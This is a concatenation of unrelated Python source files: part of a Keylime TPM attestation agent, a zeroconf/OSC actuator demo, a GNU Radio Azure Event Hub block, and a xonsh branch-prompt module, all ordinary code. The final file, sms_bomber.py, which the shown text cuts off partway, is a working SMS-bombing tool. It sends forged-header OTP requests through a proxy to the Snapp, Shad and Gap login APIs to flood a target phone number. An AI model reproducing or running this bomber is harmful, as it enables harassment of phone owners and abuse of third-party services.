# now extend a measurement of the payload and key if there was one
pcr = config.getint('cloud_agent', 'measure_payload_pcr')
if 0 < pcr < 24:
logger.info("extending measurement of payload into PCR %s", pcr)
measured = tpm_instance.hashdigest(tomeasure)
tpm_instance.extendPCR(pcr, measured)
if payload_thread is not None:
payload_thread.start()
return
# pylint: disable=W0622
def log_message(self, format, *args):
return
# consider using PooledProcessMixIn
# https://github.com/muayyad-alsadi/python-PooledProcessMixIn
class CloudAgentHTTPServer(ThreadingMixIn, HTTPServer):
"""Http Server which will handle each request in a separate thread."""
    # Do not modify directly unless you acquire uvLock. Sets are used so that contained values stay unique.
u_set = set()
v_set = set()
rsaprivatekey = None
rsapublickey = None
rsapublickey_exportable = None
mtls_cert_path = None
rsakey_path = None
mtls_cert_enabled = False
mtls_cert = None
done = threading.Event()
auth_tag = None
payload = None
enc_keyname = None
K = None
final_U = None
agent_uuid = None
next_ima_ml_entry = 0 # The next IMA log offset the verifier may ask for.
boottime = int(psutil.boot_time())
def __init__(self, server_address, RequestHandlerClass, agent_uuid, contact_ip, ima_log_file, tpm_log_file_data):
"""Constructor overridden to provide ability to pass configuration arguments to the server"""
# Find the locations for the U/V transport and mTLS key and certificate.
# They are either relative to secdir (/var/lib/keylime/secure) or absolute paths.
secdir = secure_mount.mount()
keyname = config.get('cloud_agent', 'rsa_keyname')
if not os.path.isabs(keyname):
keyname = os.path.join(secdir, keyname)
# read or generate the key depending on configuration
if os.path.isfile(keyname):
# read in private key
logger.info("Using existing key in %s", keyname)
            with open(keyname, "rb") as f:
                rsa_key = crypto.rsa_import_privkey(f.read())
else:
logger.info("Key for U/V transport and mTLS certificate not found, generating a new one")
rsa_key = crypto.rsa_generate(2048)
with open(keyname, "wb") as f:
f.write(crypto.rsa_export_privkey(rsa_key))
self.rsakey_path = keyname
self.rsaprivatekey = rsa_key
self.rsapublickey_exportable = crypto.rsa_export_pubkey(
self.rsaprivatekey)
self.mtls_cert_enabled = config.getboolean('cloud_agent', 'mtls_cert_enabled', fallback=False)
if self.mtls_cert_enabled:
certname = config.get('cloud_agent', 'mtls_cert')
if not os.path.isabs(certname):
certname = os.path.join(secdir, certname)
if os.path.isfile(certname):
logger.info("Using existing mTLS cert in %s", certname)
with open(certname, "rb") as f:
mtls_cert = x509.load_pem_x509_certificate(f.read(), backend=default_backend())
else:
logger.info("No mTLS certificate found, generating a new one")
agent_ips = [server_address[0]]
if contact_ip is not None:
agent_ips.append(contact_ip)
with open(certname, "wb") as f:
                    # By default generate a TLS certificate valid for roughly 5 years (5 * 360 days)
                    valid_until = datetime.datetime.utcnow() + datetime.timedelta(days=(360 * 5))
                    mtls_cert = crypto.generate_selfsigned_cert(agent_uuid, rsa_key, valid_until, agent_ips)
f.write(mtls_cert.public_bytes(serialization.Encoding.PEM))
self.mtls_cert_path = certname
self.mtls_cert = mtls_cert
else:
self.mtls_cert_path = None
self.mtls_cert = None
logger.info("WARNING: mTLS disabled, Tenant and Verifier will reach out to agent via HTTP")
# attempt to get a U value from the TPM NVRAM
nvram_u = tpm_instance.read_key_nvram()
if nvram_u is not None:
logger.info("Existing U loaded from TPM NVRAM")
self.add_U(nvram_u)
http.server.HTTPServer.__init__(
self, server_address, RequestHandlerClass)
self.enc_keyname = config.get('cloud_agent', 'enc_keyname')
self.agent_uuid = agent_uuid
self.ima_log_file = ima_log_file
self.tpm_log_file_data = tpm_log_file_data
def add_U(self, u):
"""Threadsafe method for adding a U value received from the Tenant
        Do not modify u_set or v_set directly.
"""
with uvLock:
# be very careful printing K, U, or V as they leak in logs stored on unprotected disks
if config.INSECURE_DEBUG:
logger.debug("Adding U len %d data:%s", len(u), base64.b64encode(u))
self.u_set.add(u)
def add_V(self, v):
"""Threadsafe method for adding a V value received from the Cloud Verifier
        Do not modify u_set or v_set directly.
"""
with uvLock:
# be very careful printing K, U, or V as they leak in logs stored on unprotected disks
if config.INSECURE_DEBUG:
logger.debug("Adding V: %s", base64.b64encode(v))
self.v_set.add(v)
def attempt_decryption(self):
"""On reception of a U or V value, this method is called to attempt the decryption of the Cloud Init script
        At least one U and one V value must have been received in order to attempt decryption. Multiple U and V values are stored
to prevent an attacker from sending U/V values to deny service.
"""
with uvLock:
both_u_and_v_present = False
return_value = False
for u in self.u_set:
for v in self.v_set:
both_u_and_v_present = True
return_value = self.decrypt_check(u, v)
if return_value:
# reset u and v sets
self.u_set = set()
self.v_set = set()
return return_value
# TODO check on whether this happens or not. NVRAM causes trouble
if both_u_and_v_present:
pass
# logger.critical("Possible attack from: " + str(handler.client_address) + ". Both U (potentially stale from TPM NVRAM) and V present but unsuccessful in attempt to decrypt check value.")
return return_value
def decrypt_check(self, decrypted_U, decrypted_V):
"""Decrypt the Cloud init script with the passed U and V values.
This method will access the received auth tag, and may fail if decoy U and V values were received.
        Do not call directly unless you acquire uvLock. Returns True if the expected key could be derived,
        False otherwise, and None if no auth tag is available yet or the U and V lengths do not match.
"""
if self.auth_tag is None:
return None
if len(decrypted_U) != len(decrypted_V):
logger.warning("Invalid U len %d or V len %d. skipping...", len(decrypted_U), len(decrypted_V))
return None
candidate_key = crypto.strbitxor(decrypted_U, decrypted_V)
# be very careful printing K, U, or V as they leak in logs stored on unprotected disks
if config.INSECURE_DEBUG:
logger.debug("U: %s", base64.b64encode(decrypted_U))
logger.debug("V: %s", base64.b64encode(decrypted_V))
logger.debug("K: %s", base64.b64encode(candidate_key))
logger.debug("auth_tag: %s", self.auth_tag)
ex_mac = crypto.do_hmac(candidate_key, self.agent_uuid)
if ex_mac == self.auth_tag:
logger.info("Successfully derived K for UUID %s", self.agent_uuid)
self.final_U = decrypted_U
self.K = candidate_key
return True
logger.error("Failed to derive K for UUID %s", self.agent_uuid)
return False
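# Illustrative sketch only (not part of the original file): the bootstrap key
# handling above boils down to
#
#     K = crypto.strbitxor(U, V)                      # U from the Tenant, V from the Verifier
#     ok = crypto.do_hmac(K, agent_uuid) == auth_tag  # auth_tag arrives with the U key
#
# so neither half-key alone is sufficient, and the auth tag is what lets the
# agent pick the correct (U, V) pairing out of u_set/v_set when decoy values
# have been received.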
def revocation_listener():
"""
This configures and starts the revocation listener. It is designed to be started in a separate process.
"""
if config.has_option('cloud_agent', 'listen_notifications'):
if not config.getboolean('cloud_agent', 'listen_notifications'):
return
# keep old typo "listen_notfications" around for a few versions
if config.has_option('cloud_agent', 'listen_notfications'):
logger.warning('Option typo "listen_notfications" is deprecated. Please use "listen_notifications" instead.')
if not config.getboolean('cloud_agent', 'listen_notfications'):
return
secdir = secure_mount.mount()
cert_path = config.get('cloud_agent', 'revocation_cert')
if cert_path == "default":
cert_path = os.path.join(secdir,
"unzipped/RevocationNotifier-cert.crt")
elif cert_path[0] != '/':
# if it is a relative, convert to absolute in work_dir
cert_path = os.path.abspath(
os.path.join(config.WORK_DIR, cert_path))
# Callback function handling the revocations
def perform_actions(revocation):
actionlist = []
# load the actions from inside the keylime module
actionlisttxt = config.get('cloud_agent', 'revocation_actions')
if actionlisttxt.strip() != "":
actionlist = actionlisttxt.split(',')
            actionlist = [f"revocation_actions.{i}" for i in actionlist]
# load actions from unzipped
action_list_path = os.path.join(secdir, "unzipped/action_list")
if os.path.exists(action_list_path):
with open(action_list_path, encoding="utf-8") as f:
actionlisttxt = f.read()
if actionlisttxt.strip() != "":
localactions = actionlisttxt.strip().split(',')
for action in localactions:
if not action.startswith('local_action_'):
logger.warning("Invalid local action: %s. Must start with local_action_", action)
else:
actionlist.append(action)
uzpath = os.path.join(secdir, "unzipped")
if uzpath not in sys.path:
sys.path.append(uzpath)
for action in actionlist:
logger.info("Executing revocation action %s", action)
try:
module = importlib.import_module(action)
execute = getattr(module, 'execute')
asyncio.get_event_loop().run_until_complete(execute(revocation))
except Exception as e:
logger.warning("Exception during execution of revocation action %s: %s", action, e)
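    # Illustrative note (not part of the original file), with hypothetical action names:
    # a config line such as
    #
    #   revocation_actions = rebuild_allowlist,update_crl
    #
    # is resolved by perform_actions() to the modules "revocation_actions.rebuild_allowlist"
    # and "revocation_actions.update_crl", while actions shipped in the payload's
    # action_list file must be named "local_action_<something>" to be accepted.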
try:
while True:
try:
revocation_notifier.await_notifications(
perform_actions, revocation_cert_path=cert_path)
except Exception as e:
logger.exception(e)
logger.warning("No connection to revocation server, retrying in 10s...")
time.sleep(10)
except (KeyboardInterrupt, SystemExit):
logger.info("Stopping revocation listener...")
def main():
for ML in [config.MEASUREDBOOT_ML, config.IMA_ML]:
if not os.access(ML, os.F_OK):
logger.warning("Measurement list path %s not accessible by agent. Any attempt to instruct it to access this path - via \"keylime_tenant\" CLI - will result in agent process dying", ML)
ima_log_file = None
if os.path.exists(config.IMA_ML):
ima_log_file = open(config.IMA_ML, 'r', encoding="utf-8")
tpm_log_file_data = None
if os.path.exists(config.MEASUREDBOOT_ML):
with open(config.MEASUREDBOOT_ML, 'rb') as tpm_log_file:
tpm_log_file_data = base64.b64encode(tpm_log_file.read())
if config.get('cloud_agent', 'agent_uuid') == 'dmidecode':
if os.getuid() != 0:
raise RuntimeError('agent_uuid is configured to use dmidecode, '
'but current process is not running as root.')
cmd = ['which', 'dmidecode']
ret = cmd_exec.run(cmd, raiseOnError=False)
if ret['code'] != 0:
raise RuntimeError('agent_uuid is configured to use dmidecode, '
                               'but it is not found on the system.')
# initialize the tmpfs partition to store keys if it isn't already available
secdir = secure_mount.mount()
# Now that operations requiring root privileges are done, drop privileges
# if 'run_as' is available in the configuration.
if os.getuid() == 0:
run_as = config.get('cloud_agent', 'run_as', fallback='')
if run_as != '':
user_utils.chown(secdir, run_as)
user_utils.change_uidgid(run_as)
logger.info("Dropped privileges to %s", run_as)
else:
logger.warning("Cannot drop privileges since 'run_as' is empty or missing in keylime.conf agent section.")
    # Instantiate the TPM class
instance_tpm = tpm()
# get params for initialization
registrar_ip = config.get('cloud_agent', 'registrar_ip')
registrar_port = config.get('cloud_agent', 'registrar_port')
# get params for the verifier to contact the agent
contact_ip = os.getenv("KEYLIME_AGENT_CONTACT_IP", None)
if contact_ip is None and config.has_option('cloud_agent', 'agent_contact_ip'):
contact_ip = config.get('cloud_agent', 'agent_contact_ip')
contact_port = os.getenv("KEYLIME_AGENT_CONTACT_PORT", None)
if contact_port is None and config.has_option('cloud_agent', 'agent_contact_port'):
contact_port = config.get('cloud_agent', 'agent_contact_port', fallback="invalid")
# change dir to working dir
fs_util.ch_dir(config.WORK_DIR)
# set a conservative general umask
os.umask(0o077)
# initialize tpm
(ekcert, ek_tpm, aik_tpm) = instance_tpm.tpm_init(self_activate=False, config_pw=config.get(
'cloud_agent', 'tpm_ownerpassword')) # this tells initialize not to self activate the AIK
virtual_agent = instance_tpm.is_vtpm()
# Warn if kernel version is <5.10 and another algorithm than SHA1 is used,
# because otherwise IMA will not work
kernel_version = tuple(platform.release().split("-")[0].split("."))
if tuple(map(int,kernel_version)) < (5, 10, 0) and instance_tpm.defaults["hash"] != algorithms.Hash.SHA1:
logger.warning("IMA attestation only works on kernel versions <5.10 with SHA1 as hash algorithm. "
"Even if ascii_runtime_measurements shows \"%s\" as the "
"algorithm, it might be just padding zeros", (instance_tpm.defaults["hash"]))
if ekcert is None:
if virtual_agent:
ekcert = 'virtual'
elif instance_tpm.is_emulator():
ekcert = 'emulator'
# now we need the UUID
try:
agent_uuid = config.get('cloud_agent', 'agent_uuid')
except configparser.NoOptionError:
agent_uuid = None
if agent_uuid == 'hash_ek':
ek_pubkey = pubkey_from_tpm2b_public(base64.b64decode(ek_tpm))
ek_pubkey_pem = ek_pubkey.public_bytes(encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo)
agent_uuid = hashlib.sha256(ek_pubkey_pem).hexdigest()
elif agent_uuid == 'generate' or agent_uuid is None:
agent_uuid = str(uuid.uuid4())
elif agent_uuid == 'dmidecode':
cmd = ['dmidecode', '-s', 'system-uuid']
ret = cmd_exec.run(cmd)
sys_uuid = ret['retout'][0].decode('utf-8')
agent_uuid = sys_uuid.strip()
try:
uuid.UUID(agent_uuid)
except ValueError as e:
raise RuntimeError(f"The UUID returned from dmidecode is invalid: {str(e)}") # pylint: disable=raise-missing-from
elif agent_uuid == 'hostname':
agent_uuid = socket.getfqdn()
elif agent_uuid == 'environment':
agent_uuid = os.getenv("KEYLIME_AGENT_UUID", None)
if agent_uuid is None:
raise RuntimeError("Env variable KEYLIME_AGENT_UUID is empty, but agent_uuid is set to 'environment'")
elif not validators.valid_uuid(agent_uuid):
raise RuntimeError("The UUID is not valid")
if not validators.valid_agent_id(agent_uuid):
        raise RuntimeError("The agent ID set via the agent_uuid parameter uses invalid characters")
if config.STUB_VTPM and config.TPM_CANNED_VALUES is not None:
# Use canned values for stubbing
jsonIn = config.TPM_CANNED_VALUES
if "add_vtpm_to_group" in jsonIn:
# The value we're looking for has been canned!
agent_uuid = jsonIn['add_vtpm_to_group']['retout']
else:
# Our command hasn't been canned!
raise Exception("Command add_vtpm_to_group not found in canned json!")
logger.info("Agent UUID: %s", agent_uuid)
serveraddr = (config.get('cloud_agent', 'cloudagent_ip'),
config.getint('cloud_agent', 'cloudagent_port'))
keylime_ca = config.get('cloud_agent', 'keylime_ca')
if keylime_ca == "default":
keylime_ca = os.path.join(config.WORK_DIR, 'cv_ca', 'cacert.crt')
server = CloudAgentHTTPServer(serveraddr, Handler, agent_uuid, contact_ip, ima_log_file, tpm_log_file_data)
if server.mtls_cert_enabled:
context = web_util.generate_mtls_context(server.mtls_cert_path, server.rsakey_path, keylime_ca, logger=logger)
server.socket = context.wrap_socket(server.socket, server_side=True)
else:
if not config.getboolean('cloud_agent', 'enable_insecure_payload', fallback=False) and config.get('cloud_agent', 'payload_script') != "":
raise RuntimeError('agent mTLS is disabled, while a tenant can instruct the agent to execute code on the node. '
'In order to allow the running of the agent, "enable_insecure_payload" has to be set to "True"')
serverthread = threading.Thread(target=server.serve_forever, daemon=True)
# register it and get back a blob
mtls_cert = "disabled"
if server.mtls_cert:
mtls_cert = server.mtls_cert.public_bytes(serialization.Encoding.PEM)
keyblob = registrar_client.doRegisterAgent(
registrar_ip, registrar_port, agent_uuid, ek_tpm, ekcert, aik_tpm, mtls_cert, contact_ip, contact_port)
if keyblob is None:
instance_tpm.flush_keys()
raise Exception("Registration failed")
# get the ephemeral registrar key
key = instance_tpm.activate_identity(keyblob)
if key is None:
instance_tpm.flush_keys()
raise Exception("Activation failed")
# tell the registrar server we know the key
retval = registrar_client.doActivateAgent(
registrar_ip, registrar_port, agent_uuid, key)
if not retval:
instance_tpm.flush_keys()
raise Exception("Registration failed on activate")
# Start revocation listener in a new process to not interfere with tornado
revocation_process = multiprocessing.Process(target=revocation_listener, daemon=True)
revocation_process.start()
logger.info("Starting Cloud Agent on %s:%s with API version %s. Use <Ctrl-C> to stop", serveraddr[0], serveraddr[1], keylime_api_version.current_version())
serverthread.start()
def shutdown_handler(*_):
logger.info("TERM Signal received, shutting down...")
logger.debug("Stopping revocation notifier...")
revocation_process.terminate()
logger.debug("Shutting down HTTP server...")
server.shutdown()
server.server_close()
serverthread.join()
logger.debug("HTTP server stopped...")
revocation_process.join()
logger.debug("Revocation notifier stopped...")
secure_mount.umount()
logger.debug("Umounting directories...")
instance_tpm.flush_keys()
logger.debug("Flushed keys successfully")
sys.exit(0)
signal.signal(signal.SIGTERM, shutdown_handler)
signal.signal(signal.SIGQUIT, shutdown_handler)
signal.signal(signal.SIGINT, shutdown_handler)
# Keep the main thread alive by waiting for the server thread
serverthread.join()
|
PythonActuator.py
|
#!/usr/bin/env python
"""Example of announcing a service (in this case, a fake HTTP server).
Based on https://github.com/jstasiak/python-zeroconf/blob/master/examples/registration.py
"""
import logging
import socket
import sys
from multiprocessing import Process, Manager
from time import sleep
from typing import List
import ifaddr
import numpy as np
import matplotlib
matplotlib.use('Qt5Agg')
import matplotlib.pyplot as plt
from matplotlib import animation
print(plt.get_backend())
from zeroconf import ServiceInfo, Zeroconf
__copyright__ = "Copyright 2019, RISE Research Institutes of Sweden"
__author__ = "Naveed Anwar Bhatti and Martina Brachmann"
motor_values = Manager().list()
def get_all_addresses() -> List[str]:
return list(set(
addr.ip
for iface in ifaddr.get_adapters()
for addr in iface.ips
if addr.is_IPv4 and addr.network_prefix != 32 # Host only netmask 255.255.255.255
))
def get_local_ip(starts_with="192"):
list_ip = get_all_addresses()
local_ip = [i for i in list_ip if i.startswith(starts_with)]
return local_ip[0]
def save_motor_value(unused_addr, args, motor):
args[1].append(motor)
def get_motor_value():
if len(motor_values) > 1:
return motor_values.pop(0)
else:
return motor_values[0]
def animate(frameno, p1):
p1[0].set_height(get_motor_value())
return p1
def run_OSC(motor_values_):
from pythonosc import dispatcher
from pythonosc import osc_server
dispatcher = dispatcher.Dispatcher()
dispatcher.map("/motor", save_motor_value, "Motor", motor_values_)
server = osc_server.ThreadingOSCUDPServer((server_ip, 3335), dispatcher)
print("Serving OSC on {}".format(server.server_address))
server.serve_forever()
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
if len(sys.argv) > 1:
assert sys.argv[1:] == ['--debug']
logging.getLogger('zeroconf').setLevel(logging.DEBUG)
initial_motor_state = np.random.randint(0, 100+1)
print("Initial motor state: %s" % initial_motor_state)
save_motor_value(None, [None, motor_values], initial_motor_state)
desc = {'actuator1': '/motor:0%100'}
info = ServiceInfo(type_="_osc._udp.local.",
name="PythonActuator._osc._udp.local.",
address=socket.inet_aton(get_local_ip()),
port=3335,
weight=0,
priority=0,
properties=desc,
server="PythonActuator.local.")
zeroconf = Zeroconf()
print("Registration of a service PythonActuator")
zeroconf.register_service(info)
print("Opening a TCP connection")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print(get_local_ip())
s.bind((str(get_local_ip()), 5555))
s.listen()
conn, addr = s.accept()
print("Connection address: " + str(addr))
while True:
data = conn.recv(20)
if not data:
break
server_ip = str(data.decode())
print("Server IP is: " + server_ip)
P1 = Process(target=run_OSC, args=[motor_values])
P1.start()
fig, ax = plt.subplots()
p1 = plt.bar(0, initial_motor_state, color='b')
ax.set_ylim(0, 100)
anim = animation.FuncAnimation(fig, animate, interval=0, frames=None, fargs=[p1], repeat=False, blit=True)
plt.show()
try:
while True:
pass
except KeyboardInterrupt:
pass
finally:
print("Unregistering...")
zeroconf.unregister_service(info)
zeroconf.close()
|
eventhub_detect_source.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from gnuradio import gr
from azure.eventhub import EventHubConsumerClient
from azure.schemaregistry import SchemaRegistryClient
from azure.schemaregistry.serializer.avroserializer import SchemaRegistryAvroSerializer
from azure.identity import DefaultAzureCredential
from eventhubs import models
import threading
import pmt
schema_content = models.EventHubDataFrame.avro_schema()
class eventhub_detect_source(gr.sync_block):
def __init__(self,connection_str: str = None,
endpoint: str = None, schema_group: str = None, eventhub_name: str = None, consumer_group: str = None, starting_position = None):
gr.sync_block.__init__(self,
name="eventhub_detect_source",
in_sig=[],
out_sig=[])
self.token_credential = DefaultAzureCredential()
self.endpoint = endpoint
self.schema_group = schema_group
self.eventhub_connection_str = connection_str
self.eventhub_name = eventhub_name
self.consumer_group = consumer_group
self.starting_position = starting_position
self.schema_registry_client = SchemaRegistryClient(self.endpoint, self.token_credential)
self.avro_serializer = SchemaRegistryAvroSerializer(self.schema_registry_client, self.schema_group)
self.eventhub_consumer = EventHubConsumerClient.from_connection_string(
conn_str=self.eventhub_connection_str,
consumer_group=self.consumer_group,
eventhub_name=self.eventhub_name)
self.message_port_register_out(pmt.intern('out'))
self.rxthread = threading.Thread(target=self.receive)
self.rxthread.start()
def receive(self):
self.eventhub_consumer.receive(on_event=self.on_event, starting_position=self.starting_position)
def on_event(self, partition_context, event):
bytes_payload = b"".join(b for b in event.body)
deserialized_data = self.avro_serializer.deserialize(bytes_payload)
#print("packet n is %s" % deserialized_data['pkt_num'])
        if deserialized_data['zc_root'] is not None and deserialized_data['channel_idx'] is not None:
a = pmt.make_dict()
a = pmt.dict_add(a, pmt.string_to_symbol("zc_root"), pmt.from_long(deserialized_data['zc_root']))
a = pmt.dict_add(a, pmt.string_to_symbol("chan_idx"), pmt.from_long(deserialized_data['channel_idx']))
self.message_port_pub(pmt.intern("out"), a)
def work(self, input_items, output_items):
return 0
def stop(self):
self.eventhub_consumer.close()
self.rxthread.join()
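# Illustrative usage sketch (not part of the original block); every value below is
# a placeholder, not a real namespace, hub or connection string:
#
#   src = eventhub_detect_source(
#       connection_str="Endpoint=sb://<namespace>.servicebus.windows.net/;SharedAccessKeyName=...;SharedAccessKey=...",
#       endpoint="<namespace>.servicebus.windows.net",
#       schema_group="<schema-group>",
#       eventhub_name="<event-hub>",
#       consumer_group="$Default",
#       starting_position="-1",  # "-1" is the Event Hubs convention for "from the beginning"
#   )
#
# The block has no streaming ports; each detection is published on the 'out'
# message port as a PMT dict with the keys "zc_root" and "chan_idx".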
|
vc_branch.py
|
# -*- coding: utf-8 -*-
"""Prompt formatter for simple version control branchs"""
import os
import sys
import time
import queue
import builtins
import warnings
import threading
import subprocess
import xonsh.tools as xt
def _get_git_branch(q):
try:
branches = xt.decode_bytes(subprocess.check_output(
['git', 'branch'],
stderr=subprocess.DEVNULL
)).splitlines()
except (subprocess.CalledProcessError, OSError):
q.put(None)
else:
for branch in branches:
if not branch.startswith('* '):
continue
elif branch.endswith(')'):
branch = branch.split()[-1][:-1]
else:
branch = branch.split()[-1]
q.put(branch)
break
else:
q.put(None)
def get_git_branch():
"""Attempts to find the current git branch. If this could not
be determined (timeout, not in a git repo, etc.) then this returns None.
"""
branch = None
timeout = builtins.__xonsh_env__.get('VC_BRANCH_TIMEOUT')
q = queue.Queue()
t = threading.Thread(target=_get_git_branch, args=(q,))
t.start()
t.join(timeout=timeout)
try:
branch = q.get_nowait()
except queue.Empty:
branch = None
return branch
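# Illustrative note (not part of the original module): the worker thread plus queue
# above is how the timeout is enforced without killing git, e.g.
#
#   branch = get_git_branch()   # e.g. 'master', or None on timeout / outside a repo
#
# If the subprocess outlives VC_BRANCH_TIMEOUT it keeps running in the background;
# only the prompt stops waiting for it.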
def _get_parent_dir_for(path, dir_name, timeout):
# walk up the directory tree to see if we are inside an hg repo
# the timeout makes sure that we don't thrash the file system
previous_path = ''
t0 = time.time()
while path != previous_path and ((time.time() - t0) < timeout):
if os.path.isdir(os.path.join(path, dir_name)):
return path
previous_path = path
path, _ = os.path.split(path)
return (path == previous_path)
def get_hg_branch(cwd=None, root=None):
env = builtins.__xonsh_env__
cwd = env['PWD']
root = _get_parent_dir_for(cwd, '.hg', env['VC_BRANCH_TIMEOUT'])
if not isinstance(root, str):
# Bail if we are not in a repo or we timed out
if root:
return None
else:
return subprocess.TimeoutExpired(['hg'], env['VC_BRANCH_TIMEOUT'])
if env.get('VC_HG_SHOW_BRANCH') is True:
# get branch name
branch_path = os.path.sep.join([root, '.hg', 'branch'])
if os.path.exists(branch_path):
with open(branch_path, 'r') as branch_file:
branch = branch_file.read()
else:
branch = 'default'
else:
branch = ''
# add bookmark, if we can
bookmark_path = os.path.sep.join([root, '.hg', 'bookmarks.current'])
if os.path.exists(bookmark_path):
with open(bookmark_path, 'r') as bookmark_file:
active_bookmark = bookmark_file.read()
if env.get('VC_HG_SHOW_BRANCH') is True:
branch = "{0}, {1}".format(*(b.strip(os.linesep) for b in
(branch, active_bookmark)))
else:
branch = active_bookmark.strip(os.linesep)
else:
branch = branch.strip(os.linesep)
return branch
_FIRST_BRANCH_TIMEOUT = True
def _first_branch_timeout_message():
global _FIRST_BRANCH_TIMEOUT
sbtm = builtins.__xonsh_env__['SUPPRESS_BRANCH_TIMEOUT_MESSAGE']
if not _FIRST_BRANCH_TIMEOUT or sbtm:
return
_FIRST_BRANCH_TIMEOUT = False
print('xonsh: branch timeout: computing the branch name, color, or both '
'timed out while formatting the prompt. You may avoid this by '
          'increasing the value of $VC_BRANCH_TIMEOUT or by removing branch '
'fields, like {curr_branch}, from your $PROMPT. See the FAQ '
'for more details. This message will be suppressed for the remainder '
'of this session. To suppress this message permanently, set '
'$SUPPRESS_BRANCH_TIMEOUT_MESSAGE = True in your xonshrc file.',
file=sys.stderr)
def current_branch(pad=NotImplemented):
"""Gets the branch for a current working directory. Returns an empty string
if the cwd is not a repository. This currently only works for git and hg
and should be extended in the future. If a timeout occurred, the string
'<branch-timeout>' is returned.
"""
if pad is not NotImplemented:
warnings.warn("The pad argument of current_branch has no effect now "
"and will be removed in the future")
branch = None
cmds = builtins.__xonsh_commands_cache__
if cmds.lazy_locate_binary('git') or cmds.is_empty():
branch = get_git_branch()
if (cmds.lazy_locate_binary('hg') or cmds.is_empty()) and not branch:
branch = get_hg_branch()
if isinstance(branch, subprocess.TimeoutExpired):
branch = '<branch-timeout>'
_first_branch_timeout_message()
return branch or None
def _git_dirty_working_directory(q, include_untracked):
status = None
try:
cmd = ['git', 'status', '--porcelain']
if include_untracked:
cmd.append('--untracked-files=normal')
else:
cmd.append('--untracked-files=no')
status = subprocess.check_output(cmd, stderr=subprocess.DEVNULL)
except (subprocess.CalledProcessError, OSError):
q.put(None)
if status is not None:
return q.put(bool(status))
def git_dirty_working_directory(include_untracked=False):
"""Returns whether or not the git directory is dirty. If this could not
be determined (timeout, file not found, etc.) then this returns None.
"""
timeout = builtins.__xonsh_env__.get("VC_BRANCH_TIMEOUT")
q = queue.Queue()
t = threading.Thread(target=_git_dirty_working_directory,
args=(q, include_untracked))
t.start()
t.join(timeout=timeout)
try:
return q.get_nowait()
except queue.Empty:
return None
def hg_dirty_working_directory():
"""Computes whether or not the mercurial working directory is dirty or not.
    If this cannot be determined, None is returned.
"""
env = builtins.__xonsh_env__
cwd = env['PWD']
denv = env.detype()
vcbt = env['VC_BRANCH_TIMEOUT']
# Override user configurations settings and aliases
denv['HGRCPATH'] = ''
try:
s = subprocess.check_output(['hg', 'identify', '--id'],
stderr=subprocess.PIPE, cwd=cwd,
timeout=vcbt, universal_newlines=True,
env=denv)
return s.strip(os.linesep).endswith('+')
except (subprocess.CalledProcessError, subprocess.TimeoutExpired,
FileNotFoundError):
return None
def dirty_working_directory(cwd=None):
"""Returns a boolean as to whether there are uncommitted files in version
control repository we are inside. If this cannot be determined, returns
None. Currently supports git and hg.
"""
dwd = None
cmds = builtins.__xonsh_commands_cache__
if cmds.lazy_locate_binary('git') or cmds.is_empty():
dwd = git_dirty_working_directory()
if (cmds.lazy_locate_binary('hg') or cmds.is_empty()) and (dwd is None):
dwd = hg_dirty_working_directory()
return dwd
def branch_color():
"""Return red if the current branch is dirty, yellow if the dirtiness can
    not be determined, and green if it is clean. These are bold, intense colors
for the foreground.
"""
dwd = dirty_working_directory()
if dwd is None:
color = '{BOLD_INTENSE_YELLOW}'
elif dwd:
color = '{BOLD_INTENSE_RED}'
else:
color = '{BOLD_INTENSE_GREEN}'
return color
def branch_bg_color():
"""Return red if the current branch is dirty, yellow if the dirtiness can
    not be determined, and green if it is clean. These are background colors.
"""
dwd = dirty_working_directory()
if dwd is None:
color = '{BACKGROUND_YELLOW}'
elif dwd:
color = '{BACKGROUND_RED}'
else:
color = '{BACKGROUND_GREEN}'
return color
|
sms_bomber.py
|
#dictawtor
#t.me/dictawt0r
import os
import time
import requests
from threading import Thread
proxy = {"https": "127.0.0.1:8000"}
def snap(phone):
#snap api
snapH = {"Host": "app.snapp.taxi", "content-length": "29", "x-app-name": "passenger-pwa", "x-app-version": "5.0.0", "app-version": "pwa", "user-agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36", "content-type": "application/json", "accept": "*/*", "origin": "https://app.snapp.taxi", "sec-fetch-site": "same-origin", "sec-fetch-mode": "cors", "sec-fetch-dest": "empty", "referer": "https://app.snapp.taxi/login/?redirect_to\u003d%2F", "accept-encoding": "gzip, deflate, br", "accept-language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6", "cookie": "_gat\u003d1"}
snapD = {"cellphone":phone}
try:
snapR = requests.post("https://app.snapp.taxi/api/api-passenger-oauth/v2/otp", headers=snapH, json=snapD, proxies=proxy)
if "OK" in snapR.text:
print ("sended sms:)")
else:
print ("Error!")
except:
print ("Error!")
def shad(phone):
#shad api
shadH = {"Host": "shadmessenger12.iranlms.ir","content-length": "96","accept": "application/json, text/plain, */*","user-agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","content-type": "text/plain","origin": "https://shadweb.iranlms.ir","sec-fetch-site": "same-site","sec-fetch-mode": "cors","sec-fetch-dest": "empty","referer": "https://shadweb.iranlms.ir/","accept-encoding": "gzip, deflate, br","accept-language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6"}
shadD = {"api_version":"3","method":"sendCode","data":{"phone_number":phone.split("+")[1],"send_type":"SMS"}}
try:
shadR = requests.post("https://shadmessenger12.iranlms.ir/", headers=shadH, json=shadD, proxies=proxy)
if "OK" in shadR.text:
print ("sended sms:)")
else:
print ("Error!")
except:
print ("Error!")
def gap(phone):
#gap api
gapH = {"Host": "core.gap.im","accept": "application/json, text/plain, */*","x-version": "4.5.7","accept-language": "fa","user-agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","appversion": "web","origin": "https://web.gap.im","sec-fetch-site": "same-site","sec-fetch-mode": "cors","sec-fetch-dest": "empty","referer": "https://web.gap.im/","accept-encoding": "gzip, deflate, br"}
try:
